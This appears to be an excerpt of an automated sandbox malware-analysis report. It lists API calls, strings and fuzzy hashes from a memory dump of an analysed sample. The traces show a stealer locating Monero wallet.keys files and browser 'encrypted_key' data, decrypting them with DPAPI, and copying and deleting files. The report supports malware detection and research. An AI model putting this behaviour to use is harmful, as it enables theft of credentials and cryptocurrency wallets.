                              • Instruction Fuzzy Hash: B3E08CB1A40208FBC700DFD4DC4AE697BB8EB08702F004098FD09CB280DA71AE018B92
                              APIs
                                • Part of subcall function 008BA740: lstrcpy.KERNEL32(008C0E17,00000000), ref: 008BA788
                                • Part of subcall function 008BA9B0: lstrlen.KERNEL32(?,01428900,?,\Monero\wallet.keys,008C0E17), ref: 008BA9C5
                                • Part of subcall function 008BA9B0: lstrcpy.KERNEL32(00000000), ref: 008BAA04
                                • Part of subcall function 008BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008BAA12
                                • Part of subcall function 008BA8A0: lstrcpy.KERNEL32(?,008C0E17), ref: 008BA905
                                • Part of subcall function 008B8B60: GetSystemTime.KERNEL32(008C0E1A,01429D18,008C05AE,?,?,008A13F9,?,0000001A,008C0E1A,00000000,?,01428900,?,\Monero\wallet.keys,008C0E17), ref: 008B8B86
                                • Part of subcall function 008BA920: lstrcpy.KERNEL32(00000000,?), ref: 008BA972
                                • Part of subcall function 008BA920: lstrcat.KERNEL32(00000000), ref: 008BA982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 008AA2E1
                              • lstrlen.KERNEL32(00000000,00000000), ref: 008AA3FF
                              • lstrlen.KERNEL32(00000000), ref: 008AA6BC
                                • Part of subcall function 008BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008BA7E6
                              • DeleteFileA.KERNEL32(00000000), ref: 008AA743
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: 5ce84c798e8b5063be2fdc2556f1e2a246f0f17e42e9fdc31f3bafa6d4b84089
                              • Instruction ID: 787b59fe31fa1b89e2f1b66dd5cacb5f82a68d23ae1f9e658e4f808d3abd339e
                              • Opcode Fuzzy Hash: 5ce84c798e8b5063be2fdc2556f1e2a246f0f17e42e9fdc31f3bafa6d4b84089
                              • Instruction Fuzzy Hash: D0E1D272810118AADB19EBA8DC95EEE7338FF14300F508169F516F65A1EF346A49CB63
                              APIs
                                • Part of subcall function 008BA740: lstrcpy.KERNEL32(008C0E17,00000000), ref: 008BA788
                                • Part of subcall function 008BA9B0: lstrlen.KERNEL32(?,01428900,?,\Monero\wallet.keys,008C0E17), ref: 008BA9C5
                                • Part of subcall function 008BA9B0: lstrcpy.KERNEL32(00000000), ref: 008BAA04
                                • Part of subcall function 008BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008BAA12
                                • Part of subcall function 008BA8A0: lstrcpy.KERNEL32(?,008C0E17), ref: 008BA905
                                • Part of subcall function 008B8B60: GetSystemTime.KERNEL32(008C0E1A,01429D18,008C05AE,?,?,008A13F9,?,0000001A,008C0E1A,00000000,?,01428900,?,\Monero\wallet.keys,008C0E17), ref: 008B8B86
                                • Part of subcall function 008BA920: lstrcpy.KERNEL32(00000000,?), ref: 008BA972
                                • Part of subcall function 008BA920: lstrcat.KERNEL32(00000000), ref: 008BA982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 008AD481
                              • lstrlen.KERNEL32(00000000), ref: 008AD698
                              • lstrlen.KERNEL32(00000000), ref: 008AD6AC
                              • DeleteFileA.KERNEL32(00000000), ref: 008AD72B
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: e525463cc157aad5704adbd47bf043d4afdc35766093f3bd1644ab4469e07271
                              • Instruction ID: fef5633289d01aa2e8342a7fbbd8b2e90755bcb468ebfa0647ffd17220de2b33
                              • Opcode Fuzzy Hash: e525463cc157aad5704adbd47bf043d4afdc35766093f3bd1644ab4469e07271
                              • Instruction Fuzzy Hash: C491D271910118AADB18EBA8DC95DEE7338FF14300F504169F517F65A1EF346A49CB63
                              APIs
                                • Part of subcall function 008BA740: lstrcpy.KERNEL32(008C0E17,00000000), ref: 008BA788
                                • Part of subcall function 008BA9B0: lstrlen.KERNEL32(?,01428900,?,\Monero\wallet.keys,008C0E17), ref: 008BA9C5
                                • Part of subcall function 008BA9B0: lstrcpy.KERNEL32(00000000), ref: 008BAA04
                                • Part of subcall function 008BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008BAA12
                                • Part of subcall function 008BA8A0: lstrcpy.KERNEL32(?,008C0E17), ref: 008BA905
                                • Part of subcall function 008B8B60: GetSystemTime.KERNEL32(008C0E1A,01429D18,008C05AE,?,?,008A13F9,?,0000001A,008C0E1A,00000000,?,01428900,?,\Monero\wallet.keys,008C0E17), ref: 008B8B86
                                • Part of subcall function 008BA920: lstrcpy.KERNEL32(00000000,?), ref: 008BA972
                                • Part of subcall function 008BA920: lstrcat.KERNEL32(00000000), ref: 008BA982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 008AD801
                              • lstrlen.KERNEL32(00000000), ref: 008AD99F
                              • lstrlen.KERNEL32(00000000), ref: 008AD9B3
                              • DeleteFileA.KERNEL32(00000000), ref: 008ADA32
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: 357e664747db91c0eca1e9fc2ebe30bbf7cfd39149e9e194a8303ac2df402e9a
                              • Instruction ID: ec17dd6886e4e3e6ab18a573ad27262d9815e75d38dd93768981ca07108ab827
                              • Opcode Fuzzy Hash: 357e664747db91c0eca1e9fc2ebe30bbf7cfd39149e9e194a8303ac2df402e9a
                              • Instruction Fuzzy Hash: BF81D171910118AADB18FBA8DC95DEE7738FF54300F504528F516F66A1EF346A09CB63
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen
                              • String ID:
                              • API String ID: 367037083-0
                              • Opcode ID: 453bf3b7855818723af038b0a7982670bd3ec814eee8a26175d31ea02e5307d7
                              • Instruction ID: 1c4fb92cdac34bfad4c1ca793281aa1c4ea37fc504cbe2e38acddc08ef65939f
                              • Opcode Fuzzy Hash: 453bf3b7855818723af038b0a7982670bd3ec814eee8a26175d31ea02e5307d7
                              • Instruction Fuzzy Hash: 4D412E75D10109EBCB08EFE4D895AEEB774FB54704F008418F416B6390DB75AA49DFA2
                              APIs
                                • Part of subcall function 008BA740: lstrcpy.KERNEL32(008C0E17,00000000), ref: 008BA788
                                • Part of subcall function 008A99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 008A99EC
                                • Part of subcall function 008A99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 008A9A11
                                • Part of subcall function 008A99C0: LocalAlloc.KERNEL32(00000040,?), ref: 008A9A31
                                • Part of subcall function 008A99C0: ReadFile.KERNEL32(000000FF,?,00000000,008A148F,00000000), ref: 008A9A5A
                                • Part of subcall function 008A99C0: LocalFree.KERNEL32(008A148F), ref: 008A9A90
                                • Part of subcall function 008A99C0: CloseHandle.KERNEL32(000000FF), ref: 008A9A9A
                                • Part of subcall function 008B8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 008B8E52
                              • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 008A9D39
                                • Part of subcall function 008A9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,008A4EEE,00000000,00000000), ref: 008A9AEF
                                • Part of subcall function 008A9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,008A4EEE,00000000,?), ref: 008A9B01
                                • Part of subcall function 008A9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,008A4EEE,00000000,00000000), ref: 008A9B2A
                                • Part of subcall function 008A9AC0: LocalFree.KERNEL32(?,?,?,?,008A4EEE,00000000,?), ref: 008A9B3F
                                • Part of subcall function 008A9B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 008A9B84
                                • Part of subcall function 008A9B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 008A9BA3
                                • Part of subcall function 008A9B60: LocalFree.KERNEL32(?), ref: 008A9BD3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                              • String ID: $"encrypted_key":"$DPAPI
                              • API String ID: 2100535398-738592651
                              • Opcode ID: 89b083637296463fbd845a81486f92a7eaff9338ee3fa6fdf002b90a6322c3ec
                              • Instruction ID: 1fd7c7ece3d0614f2120f5c0f33add09aab84554790a6ca3ece30e1eb66c4950
                              • Opcode Fuzzy Hash: 89b083637296463fbd845a81486f92a7eaff9338ee3fa6fdf002b90a6322c3ec
                              • Instruction Fuzzy Hash: D6312CB6D10209ABDF04DBE8DC85AEEB7B8FB49304F144519E905E6241EB349A44CBA2
                              APIs
                              • CreateFileA.KERNEL32(008B3AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,008B3AEE,?), ref: 008B92FC
                              • GetFileSizeEx.KERNEL32(000000FF,008B3AEE), ref: 008B9319
                              • CloseHandle.KERNEL32(000000FF), ref: 008B9327
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$CloseCreateHandleSize
                              • String ID:
                              • API String ID: 1378416451-0
                              • Opcode ID: b3b27b2d191ec665ac7e2a5284bda1e1a1ad5caa617d76810be20afada62ddbd
                              • Instruction ID: 257585cc5a3dc288ab363ee6d8365f6af0b959f1f83dd4c9e0797a0ccddf6fd7
                              • Opcode Fuzzy Hash: b3b27b2d191ec665ac7e2a5284bda1e1a1ad5caa617d76810be20afada62ddbd
                              • Instruction Fuzzy Hash: 53F01975E44208ABDB10DBE4DC49B9E77F9EB58710F10C254F651EB3C0D670A6018B50
                              APIs
                              • __getptd.LIBCMT ref: 008BC74E
                                • Part of subcall function 008BBF9F: __amsg_exit.LIBCMT ref: 008BBFAF
                              • __getptd.LIBCMT ref: 008BC765
                              • __amsg_exit.LIBCMT ref: 008BC773
                              • __updatetlocinfoEx_nolock.LIBCMT ref: 008BC797
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                              • String ID:
                              • API String ID: 300741435-0
                              • Opcode ID: 0e2e960b5c657c8a8a5577c7957f6f17b6e4df1655f732595367ffbadc3f75b7
                              • Instruction ID: 639d13119375a35f37d0bf2f2b25d1cfd001ad8f880e77a436d7ada6804f552e
                              • Opcode Fuzzy Hash: 0e2e960b5c657c8a8a5577c7957f6f17b6e4df1655f732595367ffbadc3f75b7
                              • Instruction Fuzzy Hash: 45F09A32901A149BD725BBBD9807BEA33A0FF00725F244149F455E63D2CFB499419E9B
                              APIs
                                • Part of subcall function 008B8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 008B8E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 008B4F7A
                              • lstrcat.KERNEL32(?,008C1070), ref: 008B4F97
                              • lstrcat.KERNEL32(?,01428920), ref: 008B4FAB
                              • lstrcat.KERNEL32(?,008C1074), ref: 008B4FBD
                                • Part of subcall function 008B4910: wsprintfA.USER32 ref: 008B492C
                                • Part of subcall function 008B4910: FindFirstFileA.KERNEL32(?,?), ref: 008B4943
                                • Part of subcall function 008B4910: StrCmpCA.SHLWAPI(?,008C0FDC), ref: 008B4971
                                • Part of subcall function 008B4910: StrCmpCA.SHLWAPI(?,008C0FE0), ref: 008B4987
                                • Part of subcall function 008B4910: FindNextFileA.KERNEL32(000000FF,?), ref: 008B4B7D
                                • Part of subcall function 008B4910: FindClose.KERNEL32(000000FF), ref: 008B4B92
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                              • String ID:
                              • API String ID: 2667927680-0
                              • Opcode ID: 845e5e2d0749df956da1afe3dcd25452c3b60b470586729fc2d7929e92da6afa
                              • Instruction ID: 51f208faec017282ee99a7be5998427d8b466d8a55b6483fb1fcb781be3eac9c
                              • Opcode Fuzzy Hash: 845e5e2d0749df956da1afe3dcd25452c3b60b470586729fc2d7929e92da6afa
                              • Instruction Fuzzy Hash: 7A219B7A900208A7DB54F7F4DC86EE9377CF764300F004558B659D6291EE74AAC9CBA3